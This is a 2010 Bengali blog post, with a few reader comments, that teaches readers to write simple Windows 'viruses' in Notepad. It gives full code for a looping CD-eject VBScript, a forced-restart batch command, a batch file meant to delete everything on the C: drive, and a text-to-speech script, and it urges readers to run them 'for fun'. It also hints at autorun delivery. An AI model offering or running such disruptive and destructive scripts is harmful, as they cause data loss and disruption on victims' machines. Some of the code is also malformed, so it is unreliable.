আমার প্রিয় পোস্ট

আমার সাইটঃ http://lancercare.com/

“নিজেই যখন হ্যকার (পর্ব ১)”

৩১ শে জুলাই, ২০১০ সন্ধ্যা ৭:২৩

শেয়ারঃ
0 2 0

সারা বিশ্বের প্রোগ্রামার আর কম্পিউটারপ্রেমী মানুষের সবচেয়ে বেশি কৌতুহল যে বিষয়টি নিয়ে তা হচ্ছে হ্যাকিং। এর উপকার ও অপকার এ দুইই আছে। আমি এ পর্বটি অনেক আগে থেকেই শুরু করব ভেবেছিলাম। কিন্তু অনেকের বাধার কারণে করতে পারিনি। অবশ্য বাধা দেয়াটাই স্বাভাবিক। তাই অনেক ভাল ভাল কন্টেন্ট যেমন ফেইসবুক হ্যাকিং, মেইল অ্যাড্রেস হ্যাকিং ইত্যাদি এখান থেকে আমাকে বাদ দিতে হয়েছে :[ । তো যা হোক আমি এই পর্বটিকে কয়েকটি ভাগে ভাগ করেছি। জানি না আপনাদের ভাল লাগবে কি না। অনেকে হয়ত আগে থেকেই এ ব্যপারে অনেক কিছু জানেন। তাদের কাছ থেকে আর ও ভাল পরামর্শ আশা করব। আর একটা কথা আমার আগের ব্লগের ব্যাপারে কিছু কথা শুনলাম। যেমন, কোড কাজ করছে না কিংবা আমার ইন্সট্রাকশন অনুযায়ী ফলাফল আসছে না। যারা এ ধরনের সমস্যাতে পড়েছেন তাদের জন্য বলছি একটু ভাল করে চেক করুন। কারণ অনেক সেটিংসে অথবা কোড আপনার কম্পিউটারে কাজ নাও করতে পারে। সেক্ষত্রে আমার কিছু করার নেই। কারণ আমি তো আর আপনার কম্পিউটারের অবস্থা জানি না। আর কেউ যদি মনে করেন আপনাকে কৌশলগুলো জানতেই হবে কিন্তু আমার ইন্সট্রাকশন ও কাজ করছে না সেক্ষত্রে আমাকে বাসায় দাওয়াত করেন। আমি তখন ঠিক করে দিব। আজকের পর্বে আমরা মূলত কিছু ভাইরাস কোড করা শিখব। যেহেতু কম্পিউটার ভাইরাস সম্পর্কে আমরা সবাই আগে থেকেই কম বেশী জানি তাই আর অন্য কথা না বলে এবার চলুন সরাসরি ভাইরাস বানানো শুরু করি। প্রথমেই বলে রাখি আজকে আমরা শুধু নোটপ্যাড দিয়ে কোডিং করা শিখব।

CD-রম ওপেনারঃ এটি মুলত আপনার CD-রমকে বারবার খুলবে আর বন্ধ করবে। এটা অনেক মজার একটা ভাইরাস। তবে এটা কম্পিউটারের কোনো ক্ষতি করে না। আর এই ভাইরাসের ক্রিয়া বন্ধ করার জন্য টাস্ক ম্যানেজার (CTRL+ALT+DELETE) চালু করে 'Processes'অপশনে ক্লিক করুন। সেখানে wscript.exe নামে যে ফাইলটি পাবেন সেটা সিলেক্ট করে 'End Process'এ ক্লিক করলেই হবে। নাহলে বারবারই আপনার রম ওপেন হতে থাকবে।

প্রথম ধাপঃ নোটপ্যাড ওপেন করে নিচের কোডটি কপি করুন।
do
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection

if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
loop
দ্বিতীয় ধাপঃ এবার .vbs একে এক্সটেনশনে সেভ করুন। আপনার ভাইরাস তৈরী হয়ে গেল।
তৃতীয় ধাপঃ এবার এতে ডাবল ক্লিক করুন। আর মজা =)) দেখুন।


কম্পিউটার রিস্টার্ট ভাইরাসঃ এটি আপনার কম্পিউটারকে বারবার রিস্টার্ট দিতে থাকবে। তবে এটা প্রয়োগ করার সময় একটু সাবধান থাকবেন।

প্রথম ধাপঃ নোটপ্যাড ওপেন করে নিচের কোডটি কপি করুন।
@echo off shutdown -r -f -t 00
দ্বিতীয় ধাপঃ এবার একে .bat এক্সটেনশনে সেভ করুন। আপনার ভাইরাস তৈরী হয়ে গেল।
তৃতীয় ধাপঃ এবার এতে ডাবল ক্লিক করুন। আর মজা দেখুন।

উইন্ডোজ ক্র্যাশারঃ এই ভাইরাসটি আপনার কম্পিউটারের বারটা বাজানোর জন্য যথেষ্ট। তবে এ ভাইরাসটা না বানানোই ভাল। কারণ এটি একবার কাজ শুরু করলে উইন্ডোজ সেট আপ দেয়া ছাড়া আর কোনো উপায় নাই।

প্রথম ধাপঃ প্রথম ধাপঃ নোটপ্যাড ওপেন করে নিচের কোডটি কপি করুন।
@Echo off
Del C:\ *.* y
দ্বিতীয় ধাপঃ এবার একে .bat এক্সটেনশনে সেভ করুন। আপনার ভাইরাস তৈরী হয়ে গেল।
তৃতীয় ধাপঃ এবার এতে ডাবল ক্লিক করুন। আর মজা দেখুন।

স্পীকিং কম্পিউটার ভাইরাসঃ এটাকে মূলত ভাইরাস না বলে একটা মজার গেইম ও বলা যেতে পারে। এর দ্বারা আমরা আমাদের কম্পিউটারকে দিয়ে যা খুশি বলাতে পারি।

প্রথম ধাপঃ নোটপ্যাড ওপেন করে নিচের কোডটি কপি করুন।
Dim msg, sapi
msg=InputBox("Enter your text","My text to speak")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg
দ্বিতীয় ধাপঃ এবার একে .vbs এক্সটেনশনে সেভ করুন।
তৃতীয় ধাপঃ এবার এতে ডাবল ক্লিক করুন। একটা বক্স আসবে।
চতুর্থ ধাপঃ এতে আপনার পছন্দমত টেক্সট টাইপ করে OK করুন। এর আগে কম্পিউটার স্পিকার চালু করুন অথবা হেডফোন কানে নিন। আর মজা দেখুন।

যে কোডগুলোর কথা বললাম সেগুলোর প্রথমে সেগুলোকে অটোরান ফরম্যাটে সেভ করে আরও নতুন কিছু কমান্ড যোগ করলেই ভাইরাসগুলো প্রফেশনাল ভাইরাস হয়ে যাবে। এ ভাইরাসগুলোই আসলে আমাদের কম্পিউটারকে আক্রান্ত করে । সেগুলো আর এখানে বললাম না। কারণ অনেকে এর খারাপ প্রয়োগ করবে।

 

বিষয়বস্তুর স্বত্বাধিকার ও সম্পূর্ণ দায় কেবলমাত্র প্রকাশকারীর...

 

২. ৩১ শে জুলাই, ২০১০ সন্ধ্যা ৭:৩২
মুখোশধারী ভদ্রলোক বলেছেন: আইচ্ছা বস ভাইরাস হইয়া কি ছাগুগো মস্তিষ্কে এট্যাক করা যাই???????

কইলে বড়ই উপকার হইতো।

আর আপনার পোষ্ট প্রিয়তে নিছি।
৩. ৩১ শে জুলাই, ২০১০ রাত ৮:১০
আশীফ এন্তাজ রবি বলেছেন: ভাই আমারে এখনি মেইল করেন। আপনার সাথে একটা মজার ব্যাপার শেয়ার করবো। আপনি সিওর মজা পাবেন।
৩১ শে জুলাই, ২০১০ রাত ১১:২৫

লেখক বলেছেন: আমি মেইল করি আর আপনি আমার আই পি নিয়া আমারেই বাশ মারবেন। এইসব জানা আছে।

৪. ৩১ শে জুলাই, ২০১০ রাত ৮:৩৬
ইসফার আহমদ সিফাত বলেছেন: আরে এ তো আমাদের আসিফ ভাই । ভাই চালায়া যান । চরম হইতেছে ।
৩১ শে জুলাই, ২০১০ রাত ১১:২৬

লেখক বলেছেন: থ্যাংকস।

৫. ০৪ ঠা সেপ্টেম্বর, ২০১০ ভোর ৬:১৫
বুবলা বলেছেন: জটিল জিনিস শেয়ার করেছেন

 

মোট সময় লেগেছে ০.৮৯৩৫ সেকেন্ড

 

সামহোয়‍্যার ইন...ব্লগ বাঁধ ভাঙার আওয়াজ, মাতৃভাষা বাংলায় একটি উন্মুক্ত ও স্বাধীন মত প্রকাশের সুবিধা প্রদানকারী প্ল্যাটফর্ম। এখানে প্রকাশিত লেখা, মন্তব‍্য, ছবি, অডিও, ভিডিও বা যাবতীয় কার্যকলাপের সম্পূর্ণ দায় শুধুমাত্র সংশ্লিষ্ট প্রকাশকারীর...
© সামহোয়্যার ইন...নেট লিমিটেড | ব্যবহারের শর্তাবলী | গোপনীয়তার নীতি
আমার সাইটঃ
http://lancercare.com/
আর এস এস ফিড

পোস্ট আর্কাইভ

আমার লিঙ্কস

আমার বিভাগ

    কোন বিভাগ নেই